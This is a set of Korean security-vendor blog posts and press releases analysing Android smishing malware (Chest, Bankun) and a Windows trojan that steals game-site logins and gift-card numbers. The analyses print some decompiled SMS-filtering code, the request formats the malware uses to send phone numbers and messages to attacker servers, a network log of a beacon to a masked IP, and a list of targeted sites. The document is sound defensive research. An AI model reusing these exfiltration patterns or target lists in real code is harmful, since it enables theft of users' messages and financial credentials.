- 올해 8월, 스미싱 악성코드 전월 대비 2배 이상 급증 

- 소액결제에서 금융정보 훔치는 악성코드로 진화 

- 주소록 내 모든 연락처로 스미싱 문자 발송하는 신종 악성코드도 발견 

- 메시지 내 URL 실행 자제, ‘알 수 없는 출처(소스)’의 허용 금지 설정, 백신으로 주기적 검사, 앱 다운로드 전 평판 확인 등 필요 


안랩[대표 김홍선, www.ahnlab.com]은 최근 스미싱[보충자료1] 악성코드가 급증하고 있다며 스마트폰 사용자의 주의를 당부했다.

 

안랩은 내부 집계 결과[보충설명2] 지난 2012년 12월까지 스미싱 악성코드가 매월 각 1~10개 이내로 발견되었으나 2013년 1월 68개로 늘어난 이후 2월 174개, 3월 262개로 늘어났으며 5월 들어서 345개를 기록, 300개를 넘어선 이후 8월 들어 725개로 전월 대비 2배 이상 증가했다고 밝혔다. 2012년 한 해 동안 발견된 스미싱 악성코드가 전체 29개인 데 비해 2013년 1월부터 8월까지 총 2,433 개가 발견되어 무려 84배나 증가했다.

 

안랩은 특히 8월에 발견된 스미싱 악성코드 725개 중 실제 금전 피해를 입히는 체스트 악성코드가 252개에 달해 34.8%를 차지한다고 언급했다.

 

또한 8월에 발견된 체스트 악성코드 중 일부는 변종인 것으로 밝혀졌다. 변종 체스트 악성코드는 스마트폰 사용자의 모든 SMS[Short Message Service]를 탈취하며, 스마트폰에 저장된 정상적인 은행 앱을 삭제하고 악성 앱을 설치해 사용자의 금융정보를 탈취하는 것으로 분석됐다.

 

기존의 단순 소액결제[30만원 이하]를 노리던 것에서 금전 피해 규모가 커질 우려가 있는 [사용자의]금융정보를 훔치는 형태로 진화하였다. [변종 체스트 악성코드가 탈취하는 금융정보는 스마트폰 사용자의 계좌번호, 비밀번호, 보안카드 일련번호, 보안카드 번호 등[공인인증서 제외]이다.]

 

지난 해 처음 발견된 체스트는 스마트폰 사용자의 통신사 정보와 그에 따른 SMS를 탈취해 소액결제를 노리는, 실제 금전 피해를 야기한 최초의 모바일 악성코드이다.

 

8월에는 이 밖에도 인터넷으로부터 악성 앱을 다운로드해 설치하고, 스마트폰 내 주소록에 있는 모든 연락처로 스미싱 메시지를 배포하는 신종 악성코드 "뱅쿤"[보충자료 3]도 새롭게 확인되었다. [진단명:Android-Downloader/Bankun]

 

이호웅 안랩 시큐리티대응센터장은 “스미싱을 이용한 범죄가 날로 지능화하고 있다. 안랩 V3모바일 등 정상 앱을 사칭하는 것은 물론이고, 최근 모바일 청첩장이나 돌잔치 초대장을 가장해 사용자의 주소록을 활용하여 대량으로 유포하는 형태가 등장하고 있어, 각별한 주의가 필요하다”고 말했다.

 

스미싱 피해를 줄이기 위해 사용자는 SNS[Social Networking Service]나 문자 메시지에 포함된 URL 실행을 자제하고, 모바일 백신으로 스마트폰을 주기적으로 검사해야 한다. 또한 사용자들은 “알 수 없는 출처[소스]"의 허용 금지 설정을 해두어야 하며 반드시 정상 마켓을 이용해야 한다. 하지만, 정상 마켓에도 악성 앱이 올라오는 경우가 있어, 앱을 다운로드하기 전에 평판 등을 반드시 확인해 보는 것이 중요하다.

 

안랩은 현재 삼성[갤럭시 제품군]과 LG[옵티머스 제품군] 스마트폰에 기본탑재 방식으로 V3 모바일을 제공하고 있다.

 

--------<보충자료>--------

 

1. 스미싱

스미싱은 문자메시지[SMS]와 피싱[Phishing]의 합성어로 스마트폰 이용자가 인터넷 주소를 클릭하면 악성코드가 설치되며 이를 보낸 해커가 결제정보 등 개인정보를 빼돌리는 신종 사기 수법이다.

 

2. 스미싱 동향 조사 요약

안랩은 스미싱 동향 조사 결과 2013년 1월부터 8월까지 총 2,433 개의 악성코드가 수집되었다고 밝혔다. 2012년 한 해 동안 발생한 스미싱 악성코드는 29개로 작년 대비 무려 84배나 증가했다.

 

스미싱 악성코드는 2012년 말부터 본격적으로 발견되기 시작해 현재까지 매월 지속적으로 증가하고 있다. 2013년 5월부터는 급격히 증가하기 시작해 3 달간 월평균 330건~350건의 악성코드가 수집 되었으며, 특히 8월에는 700건 이상이 접수되는 등 스미싱을 노린 악성코드가 2배 이상 급증하였다.  


3. 뱅쿤[Bankun] 악성코드

스마트폰에 설치된 정상 은행 앱을 삭제한 후 악성 은행 앱 설치를 유도하는 악성코드. 또한 사용자의 주소록 정보를 외부로 유출하고 주소록에 저장된 번호로 스미싱 문자를 발송하는 것으로 밝혀진 악성코드이다. [진단명: Android-Downloader/Bankun]

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

 

 최근 모바일 청첩장으로 위장한 문자 메시지의 첨부된 링크를 통해 악성 앱이 유포되어 사용자들의 주의가 요구된다. 이러한 스미싱 문자는 사용자가 관심을 가질 수 있는 다양한 내용으로 유포되고 있기 때문에 악성 앱에 쉽게 감염될 수 있다.

다음은 사용자에게 수신된 모바일 청첩장을 위장한 스미싱 메시지 화면이다. 문자 메시지의 단축 URL을 연결할 경우 특정 APK 파일(http://126.***.***.217/danal.apk)이 다운로드 된다.

[그림 1] 모바일 청첩장을 위장한 스미싱 문자

 

악성 앱이 설치되면 다음과 같이 소액결제를 유발하는 악성 앱을 확인 할 수 있다.

[그림 2] 악성 앱 아이콘

해당 앱은 휴대전화 상태, SMS 정보, 네트워크 통신, 내장 메모리를 접근하는 수행 권한을 사용한다.

 

[그림 3] 수행 권한 정보

 

디컴파일 코드를 분석해 보면 휴대전화 상태 정보를 접근하는 코드가 확인된다.

[그림 4] 디컴파일 코드

 

악성 앱을 통해 수집된 정보는 아래와 같은 형식으로 특정 웹 서버(126.***.***.217)로 전송된다.

[그림 5] 디컴파일 코드


분석 당시 악성 앱을 유포하고 있는 서버로 연결되는 것을 확인 할 수 있었다.

[그림 6] 서버 연결 정보

 

해당 악성코드는 V3 Mobile 제품을 통해 진단이 가능하다.

 

<V3 제품군의 진단명>

Android-Trojan/SMSstealer



신고
Posted by DH, L@@

- 작년 4분기 14종에서 올해 1분기 225종으로 16배 급증 

- 커피 등 무료 쿠폰 가장한 SMS로 악성코드 설치 유도 

- 소액결제 인증 SMS 탈취해 사용자 몰래 결제



스마트폰 소액결제를 노린 안드로이드 악성코드 ‘체스트[chest]의 변종이 급증하고 그로 인한 피해도 증가해 사용자의 주의가 필요하다.

 

글로벌 보안 기업 안랩[구 안철수 연구소, 대표 김홍선, www.ahnlab.com]은 지난해 10월부터 피해를 일으키고 있는 안드로이드 악성코드 ‘체스트[chest]’의 변종이 올해 들어 급증했다고 밝혔다. 작년 10월~12월 동안 14종이 발견됐으나 올해 들어서는 1월부터 3월 7일 현재까지 225종이 발견돼 16배나 늘어난 수치다.

 

체스트 변종의 배포 방식은 종전과 동일하지만, 소스 코드가 일부 추가/변경된 것이 특징이다. 커피, 외식, 영화 등 다양한 유명 브랜드를 사칭한 무료 쿠폰 안내와 URL을 문자로 보내 사용자를 현혹한다. 사용자가 무심코 URL을 클릭해 해당 페이지에서 애플리케이션[이하 앱]을 설치하면 본인도 모르게 소액결제가 이루어져 금전 피해를 보게 된다. 안랩은 최근 발견한 ‘체스트’ 변종을 분석해 블로그에 상세 정보를 올렸다[http://asec.ahnlab.com/920].

 

이에 따르면 악성코드 제작자는 사전에 입수한 정보를 토대로 SMS[악성 앱 설치 유도 메시지] 수신자[타깃]를 웹 화면에서 관리 및 모니터링하는 것으로 밝혀졌다. 악성코드 제작자는 공격 대상을 정하면 ‘어플 설치하면 카페라떼+치즈케익이 공짜’ 등 사용자를 현혹하는 내용과 URL을 문자 메시지로 보낸다. 사용자가 단축 URL을 클릭해 앱을 설치하면 유명 커피 전문점을 사칭한 아이콘이 생성되고 서비스에 등록된다.

 

사용자가 악성 앱을 실행하면 ‘사용자 급증으로 시스템 과부화로 잠시 후에 다시 이용 바랍니다.’라는 메시지가 뜬다. 이는 피해자를 속이기 위한 허위 메시지이다. 악성 앱이 실행되면 통신사 정보와 스마트폰 번호가 악성코드 제작자에게 전송된다. 악성코드 제작자는 정보를 확보한 후 즉시 소액결제를 시도하고 이때 수신된 인증번호를 사용자 몰래 가로채서 금전을 탈취한다.

 

기존 악성코드는 대부분 불특정 다수를 대상으로 하고 개인정보 탈취가 주 목적이었다. 하지만 ‘체스트[chest]’는 과거 발생한 대량의 개인정보유출 사고를 통해 유출된 개인정보 중 주민번호와 전화번호를 이용해 특정한 공격 대상을 정한다는 점에서 기존 악성코드보다 진보된 형태라 할 수 있다.

 

특히, 소액결제 시 반드시 필요한 인증번호 문자 메시지가 사용자 몰래 직접 악성코드 제작자에게 전달되도록 설계되어 피해 사실을 당장 알기 어렵고, 사용자는 청구서가 나온 후에야 피해를 확인할 수 있다는 점, 대부분의 사용자가 핸드폰 사용 내역서를 꼼꼼히 살펴보지 않는다는 점에서 이후 유사한 피해가 추가 발생할 우려가 높다.

 

국내 휴대폰 소액결제 서비스 한도 금액이 일인 당 매월 30만원으로 제한되어 있긴 하지만 현재 시장 규모가 2조8000억 원에 이르는 것을 감안하면 전체 피해액은 매우 클 수 있다.

 

안랩 이호웅 시큐리티대응센터장은 “사용자는 문자로 전송된 URL을 클릭할 때나 해당 페이지에서 요구하는 앱 설치에 주의해야 한다. 또한, 서드파티 마켓은 물론 구글 공식 마켓이라도 안심하지 말고 평판을 읽어본 후 설치하고, 새로운 앱은 1주일 이상 여유를 두고 평판을 지켜본 후 설치하는 등 신중함이 필요하다. 아울러 수시로 V3 모바일과 같은 스마트폰 전용 백신으로 점검을 해보는 습관이 필요하다.”라고 주의를 당부했다.

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

 

안드로이드 기반의 스마트폰 사용자의 소액결제 인증번호를 가로채는 '체스트' (Android-Trojan/Chest)로 인한 사용자의 피해가 끊이지 않고 있으며, 변종이 끊임없이 유포되고 있다.

최근 유포되고 있는 악성 앱에 대하여 살펴보고, 추가된 코드는 무엇인지 확인 해 보겠다.

 

'체스트' 악성 앱은 사용자의 SMS 문자 메시지를 감시하고, 특정번호로 수신된 SMS를 악성코드 제작자에게 전송되도록 설계되었다. 이로 인하여 소액결제 인증번호가 유출되고, 그 인증번호를 이용하여 금전적 이득을 취하고 있다.

그동안 꾸준히 발견되고 있는 '체스트' 악성 앱과 배포 방식은 동일하지만, 소스 코드가 일부 추가/변경되어 유포되고 있다.

 

 

악성코드 제작자는 사전에 입수한 정보를 바탕으로 악성 앱 설치 유도 메시지를 수신할 대상자, 즉 타겟을 관리하고 모니터링 하고 있다.

 

 

[그림 1] 악성 앱 설치 유도 메시지 발송을 위한 타겟 리스트

 

 

 

 

타겟이 정해지면, 아래와 같은 문자메시지를 통하여 스마트폰 사용자에게 악성 앱 설치를 유도 한다.

 

[그림 2] 악성 앱 설치 유도 문자 메시지

 

단축 URL로 연결하여 앱을 설치하면, 아래와 같은 유명한 커피 전문점 "**** 쿠폰" 아이콘이 생성되며, 서비스에 등록된다.

[그림 3] 악성 앱 설치 화면(좌) / 실행중인 서비스 목록(우)

 

악성 앱의 권한을 확인함으로써 악성 행위(SMS 를 감시/수집)를 유추할 수 있다.

 

[그림 4] 악성 앱이 요구하는 권한 정보

 

악성 앱을 실행하면 아래와 같이 시스템 과부화로 잠시 후 다시 이용할 것을 권하고 있다. 소액결제 인증번호를 수집하기 위한 시간을 벌기 위하여, 즉 일정 시간 동안 악성 앱이 삭제되는 것을 예방하고자 계획된 화면을 보여주는 것이다.

 

[그림 5] 의도된 오류 메시지 팝업

 

 

악성 앱이 실행되면, 아래 코드에 의하여 스마트폰의 전화번호가 악성코드 제작자에게 전송된다.

감염된 스마트폰의 전화번호를 수집함으로써, 소액결제를 위한 인증번호 발송 작업을 진행하게 된다.

[그림 6] 특정번호로 수신된 SMS 감시/수집 코드

 

위 코드가 실행되면 "mobile=전화번호" 의 형태로 스마트폰의 전화번호가 전송 된다.

 

이 후, 악성코드 제작자는 아래와 같은 코드를 이용하여 특정번호(송신자)를 포함하는 SMS를 감시하고 있다.

if ((!this.numberchk3.equals("01")) || (this.numberchk1.equals("15")) || (this.numberchk1.equals("16")) || (this.numberchk2.equals("01015")) || (this.numberchk2.equals("01016")) || (this.numberchk3.equals("15")) || (this.numberchk3.equals("16")) || (this.numberchk4.equals("01015")) || (this.numberchk4.equals("01016")) || (this.numberchk1.equals("11")) || (this.numberchk3.equals("11")))

 

[그림 7] 특정번호로 수신된 SMS 감시/수집 코드

 

위와 같이 미리 정의된 번호로 발송된 SMS 는 아래와 같은 코드를 이용하여, 스마트폰 전화번호와 함께 특정서버로 전송된다.

 

[그림 8] 전화번호와 SMS 를 특정서버로 전송하는 코드

 

위 코드가 실행되면 "mobile=전화번호&revsms=SMS내용" 의 형태로 전화번호와 문자메시지가 전송 된다.

 

악성코드 제작자는 "대리운전"과 관련된 다량의 SMS 때문에 아래와 같은 코드를 추가한 것으로 보인다.

아래의 코드는 SMS 감시하면서 "대리운전" 메시지가 도착하게 되면 즉시 SMS 감시를 중지하고, 사용자에게 "대리운전" 메시지를 전달한다.

 

제작자는 더 이상 "앞뒤가 똑같은 대♥리♥운♥전 15**-15** 꼭 불러 주세요"는 받지 않을 것이다.

 

[그림 9] 대리운전 SMS 필터링

 

 

악성 앱에 감염된 사용자의 리스트를 관리하며, 수집한 SMS 에서 "소액결제 인증번호"가 존재하는지 모니터링 하고 있다.

 

 

[그림 10] 감염자로부터 전송된 SMS 내역

 

악성코드 제작자는 이러한 과정을 통하여 금전적 이득을 취하고 있다.

악성 앱에 감염되고, 당일 결제가 이루어지기 때문에 스마트폰 사용자의 각별한 주의가 필요하다.

 

해당 악성코드는 V3 Mobile 제품을 통해 진단 및 치료가 가능하다.

신고
Posted by DH, L@@

국내에서는 3가지 피해사례가 끊임없이 발견되고 있다.

1. 온라인게임 계정 유출로 인한 피해

2. 안드로이드 기반의 스마트폰 소액결제로 인한 피해

3. 상품권 번호 유출로 인한 피해

 

1,2 번 항목에 해당하는 악성코드는 ASEC 블로그를 통하여 많은 정보를 게시하였다.

http://asec.ahnlab.com/793 [온라인 게임 계정 유출 악성코드]

http://asec.ahnlab.com/772 [온라인 게임 계정 유출 악성코드]

http://asec.ahnlab.com/search/CHEST [스마트폰 SMS 정보 유출로 인한 결제 피해]

 

국내에서는 주말을 이용하여 대량 배포되고 있는 사용자의 정보 탈취용 악성코드가 끊임없이 발견되고 있다.

그 변종 또한 셀 수 없이 많으며, 이번에는 상품권 정보가 어떻게 유출 되는지 3번 항목에 대하여 살펴 보자.

 

해당 악성코드에 감염될 경우, 파일 생성 정보와 네트워크 정보는 아래와 같다.

네트워크 트래픽을 보면 PC의 MAC, OS, 사용하는 AV 정보들을 전송하는 것을 확인할 수 있다.

 

testsample.exe     CREATE C:\WINDOWS\system32\drivers\7f12a432.sys    

testsample.exe     CREATE C:\WINDOWS\system32\kakubi.dll

testsample.exe     CREATE C:\WINDOWS\system32\wshtcpbi.dll    

testsample.exe     DELETE C:\WINDOWS\system32\wshtcpip.dll    

testsample.exe     CREATE C:\WINDOWS\system32\wshtcpip.dll    

testsample.exe     CREATE C:\WINDOWS\system32\drivers\03b991b4.sys    

testsample.exe     DELETE C:\WINDOWS\system32\drivers\03b991b4.sys    

testsample.exe     DELETE C:\WINDOWS\system32\midimap.dll    

testsample.exe     CREATE C:\WINDOWS\system32\midimap.dll    

testsample.exe     CREATE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Coor.bat    

[File Monitor Information]

 

testsample.exe     TCP CONNECT     127.0.0.1    =>    2xx.16.1xx.xxx:80     

testsample.exe     HTTP CONNECT     127.0.0.1    =>    2xx.16.1xx.xxx:80     2xx.16.1xx.xxx/xx/get.asp?mac=3F72BD929D0****9E0C0E24FDDCC4F09&os=winxp%20Professional&avs=(V3)&ps=NO.&ver=NOON    

testsample.exe     TCP DISCONNECT     127.0.0.1    =>    2xx.16.1xx.xxx:80

[Network Monitor Information]

 

감염된 상태에서 특정 사이트를 접속하여 실제 유출되는 과정을 살펴보자.

 

- 계정 정보 탈취

[그림1] 북**** 닷컴 로그인 화면

 

위의 [그림1]은 북****닷컴 사이트의 로그인 화면이며, 로그인을 하게 되면 아래와 같은 패킷이 확인된다.

 

[그림2] 로그인 시, 패킷 덤프

 

[그림2]는 패킷을 캡쳐한 화면으로 GET 방식으로 2xx.2xx.xxx.xxx IP로 ID와 Password 가 전송되는 것을 확인할 수 있다.

 

- 상품권 정보 탈취

 

[그림3] 북****닷컴 상품권 입력 화면

 

 

[그림4] 상품권 번호 입력 시, 패킷덤프

 

로그인 후에 상품권 번호 입력을 하게 되면 로그인 계정과 마찬가지로 상품권 정보를 탈취하는 패킷을 확인할 수 있으며, 이 역시 같은 IP로 상품권 정보가 전송 된다. 테스트로 살펴본 북****닷컴 외에도 악성코드가 로드 되어 있을 때 메모리에서 아래의 사이트 String 정보들을 확인할 수 있었고 이 사이트들의 계정 정보도 탈취할 수 있다는 것을 보여준다.

 

aran.kr.gameclub.com

login.nexon.com

auth.siren24.com

bns.plaync.com

heroes.nexon.com

www.nexon.com

www.happymoney.co.kr

www.teencash.co.kr

www.cultureland.co.kr

www.booknlife.com

capogames.net

dragonnest.nexon.com

elsword.nexon.com

clubaudition.ndolfin.com

www.netmarble.net

itemmania.com

www.itembay.com

www.pmang.com

aion.plaync.jp

plaync.co.kr

maplestory.nexon.com

fifaonline.pmang.com

df.nexon.com

nxpay.nexon.com

baram.nexon.com

(생략…)

[그 외 해당 사이트들]

 

실제로 유출사례가 발견 되었고 꾸준히 발견되고 있는 악성코드인 만큼 사용자들의 각별한 주의가 요구된다.

이외에도 많은 악성코드들이 윈도우 및 응용프로그램 취약점을 통하여 감염된다.

따라서, 반드시 최신 보안패치를 설치하고, 안전성이 확인되지 않은 파일공유사이트(P2P, Torrent)등에서 받은 불법적인 파일은 실행하지 않는것이 중요하다.

 

Microsoft

http://update.microsoft.com

 

Flash Player 업데이트

http://get.adobe.com/kr/flashplayer/

 

▶ Java (JRE) 업데이트

http://www.java.com/ko/

 

▶ 한글과컴퓨터 업데이트 방법

http://asec.ahnlab.com/888 

 

<V3 제품군의 진단명>

Trojan/Win32.OnlineGameHack

신고
Posted by DH, L@@